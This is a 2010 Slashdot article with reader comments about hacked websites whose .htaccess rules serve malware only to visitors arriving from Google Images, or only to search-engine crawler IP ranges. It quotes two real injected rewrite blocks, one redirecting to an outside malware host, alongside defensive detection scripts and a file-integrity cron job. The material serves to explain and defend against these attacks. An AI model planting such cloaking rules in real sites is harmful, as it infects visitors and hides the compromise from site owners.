
Image Searchers Snared By Malware

Posted by samzenpus
from the caught-in-the-net dept.
Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections, and training procedures for hosting company abuse-department staffers, will have to be updated accordingly." Read on for the rest of Bennett's thoughts.

A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?

It turned out that the tradingblox.com site had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as a result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the URL into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com

then the normal page would be returned. But if you entered these commands:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/

then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.
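
For readers who would rather script the comparison than type it into telnet, here is a minimal Python sketch that builds the same two requests as raw bytes. The function name build_request is hypothetical, and the "Connection: close" header is an addition not shown in the requests above (it simply asks the server to hang up after one response). The sketch only constructs the requests; it does not send them.

```python
def build_request(host, path, referer=None):
    """Return the raw bytes of a minimal HTTP/1.1 GET request."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}"]
    if referer is not None:
        # The header name really is spelled "Referer" in HTTP.
        lines.append(f"Referer: {referer}")
    # Assumption: not part of the requests shown in the article.
    lines.append("Connection: close")
    # Each header line ends with CRLF; an empty line ends the header block.
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


# The request that returned the normal page.
plain = build_request("www.tradingblox.com", "/tradingblox/courses.htm")

# The request that returned the infected page while the site was compromised.
framed = build_request(
    "www.tradingblox.com",
    "/tradingblox/courses.htm",
    referer="http://images.google.com/",
)
```

The only difference between the two byte strings is the single Referer line, which is all the hacked server needed to decide which version of the page to serve.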

(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:

GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/

So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)

Denis Sinegubko, owner of the malware-checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)

Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)
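
The kind of check described in that parenthetical could look roughly like the Python sketch below. This is not Sinegubko's script or Google's spider; the function names, the browser-like User-Agent string, and the idea of comparing the final URL plus the response body are all assumptions made for illustration.

```python
import urllib.request


def fetch_page(url, referer=None, timeout=10):
    """Fetch url, optionally sending a Referer header.

    Returns (final_url, body) so that a redirect to another site shows up
    as a changed final URL even if the body happens to look similar.
    """
    headers = {"User-Agent": "Mozilla/5.0"}  # assumption: a browser-like UA
    if referer is not None:
        headers["Referer"] = referer
    request = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return response.geturl(), response.read()


def referers_changing_content(url, referers, fetcher=fetch_page):
    """Return the referers whose response differs from a referer-less fetch."""
    baseline = fetcher(url, None)
    return [r for r in referers if fetcher(url, r) != baseline]
```

A call such as referers_changing_content(url, ["http://www.google.com/", "http://images.google.com/"]) would then list the referers that trigger different content. Pages with rotating ads or timestamps will differ between any two fetches, so a non-empty result is a reason to look closer, not proof of infection.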

Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. Because the infected content is not served in that case, the malware infection becomes even harder to detect.

This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)

Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)
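
As a rough aid for that first look, the following Python sketch scans the text of an .htaccess file for RewriteRule lines that are guarded by conditions on the visitor's Referer, User-Agent, or IP address. The function name and the choice of which variables to treat as "visitor-dependent" are assumptions; legitimate configurations (hotlink protection, for example) also test HTTP_REFERER, so every hit needs a human to read it.

```python
import re

# Conditions that make a rule depend on who is asking rather than what is asked.
COND_RE = re.compile(
    r"^\s*RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT|REMOTE_ADDR)\}", re.I
)
# Captures the substitution (target) of a RewriteRule.
RULE_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)


def find_conditional_rewrites(htaccess_text):
    """Return (line_number, variables, target) for each guarded RewriteRule."""
    findings = []
    pending = []  # visitor-dependent variables seen since the last RewriteRule
    for lineno, line in enumerate(htaccess_text.splitlines(), start=1):
        cond = COND_RE.match(line)
        if cond:
            pending.append(cond.group(1).upper())
            continue
        rule = RULE_RE.match(line)
        if rule:
            if pending:
                findings.append((lineno, sorted(set(pending)), rule.group(1)))
            pending = []  # conditions apply only to the next RewriteRule
    return findings


# The lines found on tradingblox.com, as quoted above.
SAMPLE = """RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
"""

findings = find_conditional_rewrites(SAMPLE)
```

On the sample, the sketch reports the RewriteRule on line 5, guarded by HTTP_REFERER and pointing at an external host, which is the pattern worth investigating.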

It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of break-ins in 2009 that occurred on Linux-hosted sites were caused by malware that was installed surreptitiously on people's Windows PCs and stole the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.

But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies, like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.

And as always, keeping your PC free of spyware shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?

  • by Itninja (937614) on Thursday February 04 2010, @11:46AM (#31022918) Homepage
    For all who are hypersensitive to misspellings: the term 'referer' is not [wikipedia.org] a typo (at least, not in this article).
  • Re:This hurts.... (Score:5, Informative)

    by HTH NE1 (675604) on Thursday February 04 2010, @12:06PM (#31023176)

    Just yesterday, when searching for "LEGO Mohammad", NoScript noted a clickjacking attempt when I tried to right-click an image while in the Google Images frame, but not when I unframed it, so yeah, NoScript seems to catch it.

  • Re:lol (Score:2, Informative)

    by goofyspouse (817551) on Thursday February 04 2010, @12:18PM (#31023344)
    That you are 2 for 2 this morning? *grin*

    FWIW, I prefer "irradiated". That would kill them AND the cooties they carry.
  • We got hit by this (Score:5, Informative)

    by hedronist (233240) * on Thursday February 04 2010, @12:47PM (#31023700)

    We get so many 404s because of probes from random script kiddies that I tend to ignore that part of the daily log scan -- big mistake. (I have my own link checker so I know that all of the real URLs are correct and functioning.) It wasn't until the site owner said that we seemed to have dropped off the search results at Google that we knew something was wrong. I couldn't figure out why and spent quite a bit of time banging my head against random walls.

    Although I had looked at the logs I was mostly looking for 500 errors. I finally started to focus on the 404s and little bells started going off when I saw a whole bunch of them for msnbot. And then I saw a whole bunch for googlebot. And then I noticed that they were all under our /media path. I immediately started checking all of the URLs that had 404ed and they all worked fine. Google was also reporting that they were getting a 404 on our sitemap.xml. Shit! I tested it with their 'Test your URL' page and it worked, so I resubmitted it and ... it 404ed! WTF? (I'm still not sure why this got snarled with sitemap.xml, but it was involved.)

    I went and took a long, hot shower -- this is my place of refuge and deep thinking. The question was: what could cause all of these errors for the spider-bots, but not produce them for me or any normal human? I looked like a prune by the time it hit me: they weren't seeing the same pages/files I was. How could that happen? If this was a networking problem it would already be smelling like a firewall issue of some sort -- the unseen middleman.

    I should mention here that this is a Django site, which means I'm pretty much all over the URLs coming in ... except for /media, which are handled directly by Apache as static files. Apache ... hmmm ... !

    Apache's .htaccess file is probably the single most powerful file on your website, and you don't even see it when you do an 'ls'. I popped into the editor and I almost crapped my pants:

    RewriteCond %{HTTP_HOST} (^|www.)example.com
    RewriteCond %{REQUEST_FILENAME} ![^a-zA-Z0-9](css|js|jpe?g|gif|png|zip|swf|doc|xls|pdf|ico|tar|gz|bmp|rar|mp3|avi|mpeg|flv)(\?|$)
    RewriteCond %{REMOTE_ADDR} ^66\.249\.[6-9][0-9]\.[0-9]+$ [OR]
    RewriteCond %{REMOTE_ADDR} ^74\.125\.[0-9]+\.[0-9]+$
    RewriteCond %{REMOTE_ADDR} ^64\.233\.1[6-9][0-9]\.[0-9]+$ [OR]
    RewriteCond %{REMOTE_ADDR} ^65\.5[2-5]\.[0-9]+\.[0-9]+$ [OR]
    RewriteCond %{HTTP_USER_AGENT} (google|msnbot)
    RewriteRule ^(.*)$ pop/media/images/07_22/7_22-5.class.php [L]

    Those address ranges, btw, are all for googlebot and msnbot, so this only fires if you are coming from one of those net blocks. The special google URL checker wasn't coming from one of those addresses which is why it worked.
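
    To see why an ordinary visitor never trips conditions like these, here is a small Python sketch that tests an address against the four REMOTE_ADDR patterns quoted above. It checks each pattern on its own and does not reproduce how Apache combines the conditions with [OR]; the function name and the test addresses are made up for illustration and are not claimed to be real crawler addresses.

```python
import re

# The four REMOTE_ADDR patterns, copied from the .htaccess lines above.
BOT_ADDRESS_PATTERNS = [
    r"^66\.249\.[6-9][0-9]\.[0-9]+$",
    r"^74\.125\.[0-9]+\.[0-9]+$",
    r"^64\.233\.1[6-9][0-9]\.[0-9]+$",
    r"^65\.5[2-5]\.[0-9]+\.[0-9]+$",
]


def matching_patterns(address):
    """Return the patterns (if any) that a dotted-quad address matches."""
    return [p for p in BOT_ADDRESS_PATTERNS if re.search(p, address)]


# Illustrative addresses only.
inside_first_range = matching_patterns("66.249.66.1")
home_lan_address = matching_patterns("192.168.0.10")
```

    An address inside one of the listed blocks matches exactly one pattern, while an address on a typical home or office network matches none, so the site owner's own browser is served the clean files.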

    The scary thing is that this code is correct except for one little detail. The bots were getting 404s because the Black Hats got the path wrong. This isn't a normal PHP site and the topmost directory contains all of the Django stuff in one branch and all of the media in a different branch. Apache sees that topmost directory and it's where the .htaccess file lives, but the master .conf file has a specific <Location> rule that maps directly to /media, not /pop/media. If they had not made that error I don't know how long it would have taken to uncover this.

    We still don't know how they got in. We changed all of the passwords and double-checked that we were up to date on all of the server code. There also are multiple levels of tripwires in place now so I'll know about any changes within minutes of it happening. And now we wait . . . .

  • by CoffeePlease (596791) on Thursday February 04 2010, @01:01PM (#31023848) Homepage
    If you run insecure web apps, they can use http injection to write to your .htaccess file. See my post on how I fixed my own site after one of these attacks. http://thedesignspace.net/MT2archives/000505.html [thedesignspace.net]
  • Re:Should Be Shot (Score:2, Informative)

    by Spyware23 (1260322) on Thursday February 04 2010, @01:08PM (#31023938) Homepage

    Covered in the Q&A on NoScript's page: http://noscript.net/faq#qa2_6 [noscript.net].

    The answer Maone gives is detailed, and contains a few "fixes" for your on-your-tit-getting.

  • Re:Should Be Shot (Score:3, Informative)

    by AliasMarlowe (1042386) on Thursday February 04 2010, @01:29PM (#31024216) Journal

    I'll just throw a couple of links at you and then you can go be scared.
    http://ha.ckers.org/weird/javascriptless-port-scanning.cgi [ckers.org], http://ha.ckers.org/weird/CSS-history.cgi [ckers.org].

    Well, I just visited both of your links, and am unimpressed and unscared.

    The CSS history one gave a very short list of what looked like guessed web sites which were mostly wrong (hint: I never visit msn or ebay or myspace, and it's months since I visited yahoo). It looked like blind guesswork, as the list had google, but not slashdot, for instance. Clicking through to see what information they claim to have logged, I encountered an empty list, not even the bogus guesses of wrong web sites that were on the initial page.

    The port scanning page also gave a rather short list of all wrong IPs and one IP:port combo (hint: my LAN is not on 192.168.0.* or 192.168.1.*). Clicking through for the logged information, it just repeated the same set of all-wrong crap that was on the initial page. The only entry which was close to being plausible was 127.0.0.1:8080, since that IP obviously exists. However I have nothing on port 8080, and trying to visit that address just gives a "could not connect" error...

    Please elaborate on why I should be scared.

  • Re:orly? (Score:3, Informative)

    by swb (14022) on Thursday February 04 2010, @01:37PM (#31024342)

    Incredibly common bordering on likely the outright majority.

    For one, it's likely that most companies will have some kind of Windows infrastructure and/or Windows application requirements and thus will hand out Windows based laptops/desktops. Admins with a OSS religious affiliation may end up overwriting these systems with Linux or building their own in parallel, but controls/obstacles/requirements/misc bureaucratic bullshit may stop all but the most senior from being able to do this or make it too much of a headache.

    I know someone whose job is basically to run an RS/6000 and its application and he is required to use the Windows laptop he was given for some security/accountability purposes, and then there's the office toolchain requirements (Outlook), and then there's the UNIX support applications (all Windows based).

    And then there's sheer inertia. You can't swing your fist without hitting a Windows PC and it generally works with all the hardware, provides windowing and a GUI interface and makes even character-mode UNIX management pretty easy via putty, cut/paste, etc. Plus a lot of server apps (eg, Samba) have functional web GUIs of their own.

    Add in the occasionally hairpulling effort of getting all the hardware/graphics to work right on new laptops under Unix OSes and you can see how someone might just not care what the local video/keyboard platform was for working with a remote server.

  • by xandroid (680978) <xandroid+slashdot@ g m a i l .com> on Thursday February 04 2010, @02:32PM (#31025076) Homepage Journal

    If your site is on a shared server, it may be the case that another user of the server got hacked (or is malicious in the first place) and was able to access your files. In this case, it's a very good idea to notify your host that your files have been messed with.

    Something you may consider: make a backup of a known-good .htaccess, and set up a cronjob to `diff --brief` the two frequently and email you if they're not the same. I've done this with a list of all the PHP files in my account on a shared server:

    7 */4 * * * cd $HOME; find . -name '*.php' >tmp.phpfiles.txt; if [ -n "$(diff --brief tmp.phpfiles.txt phpfiles.txt)" ]; then diff tmp.phpfiles.txt phpfiles.txt | mail -s "new PHP files" YOUR@EMAIL.ADDRESS; fi; rm tmp.phpfiles.txt
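
    The same idea applied to .htaccess itself could be sketched in Python as below, comparing the live file against a known-good backup by SHA-256 digest. The function names are hypothetical, and treating a missing live file as "changed" is a design assumption; how the result gets mailed or logged is left out.

```python
import hashlib
from pathlib import Path


def file_digest(path):
    """Return the SHA-256 hex digest of a file's contents."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def has_changed(live_path, known_good_path):
    """True if the live file is missing or differs from the known-good copy."""
    live = Path(live_path)
    if not live.exists():
        # Assumption: a deleted .htaccess is also worth an alert.
        return True
    return file_digest(live) != file_digest(known_good_path)
```

    Run from cron, a script built on has_changed(".htaccess", "htaccess.known-good") could send a notification whenever it returns True. The backup should live somewhere the web server account cannot write, otherwise an intruder can update both copies.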

  • Re:Should Be Shot (Score:3, Informative)

    by Philip_the_physicist (1536015) on Thursday February 04 2010, @09:42PM (#31029944)

    That list is the sites being tested; if it can detect any of them in your history, it shows red text in a box next to that item. The exploit can only check a specific list of items. The problem is a UI/implementation one, not a problem with the concept.
